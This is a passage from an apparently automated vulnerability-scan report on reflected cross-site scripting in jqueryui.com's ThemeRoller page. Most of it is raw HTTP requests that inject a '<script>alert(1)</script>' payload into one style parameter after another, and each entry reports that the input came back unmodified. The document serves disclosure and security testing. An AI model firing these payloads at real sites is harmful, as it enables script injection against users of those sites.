GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=751c945"><script>alert(1)</script>d5c19407d7&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120173
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c64ac"><script>alert(1)</script>9179f8285de was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0c64ac"><script>alert(1)</script>9179f8285de&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d0d"><script>alert(1)</script>32e75550ce7 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0c9d0d"><script>alert(1)</script>32e75550ce7&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:02 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43e7a"><script>alert(1)</script>363200d54d4 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png43e7a"><script>alert(1)</script>363200d54d4&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120110
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75604"><script>alert(1)</script>ba263e0ed7c was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png75604"><script>alert(1)</script>ba263e0ed7c&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120110
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9556f"><script>alert(1)</script>e4c26e517e3 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png9556f"><script>alert(1)</script>e4c26e517e3&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120110
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ba1"><script>alert(1)</script>72d1a61f66b was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png86ba1"><script>alert(1)</script>72d1a61f66b&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120110
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ad96"><script>alert(1)</script>adb4bcaf6ab was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png6ad96"><script>alert(1)</script>adb4bcaf6ab&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:16 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120110
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd60"><script>alert(1)</script>1fc4e4ea6f4 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.pngbdd60"><script>alert(1)</script>1fc4e4ea6f4&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120110
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 119b8"><script>alert(1)</script>1d4c850f75b was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png119b8"><script>alert(1)</script>1d4c850f75b&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120110
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3967f"><script>alert(1)</script>06e01fad325 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png3967f"><script>alert(1)</script>06e01fad325&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120110
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b598f"><script>alert(1)</script>9b666fce69d was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngb598f"><script>alert(1)</script>9b666fce69d&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:02 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120110
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68d6e"><script>alert(1)</script>f49d4a88311 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e768d6e"><script>alert(1)</script>f49d4a88311&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a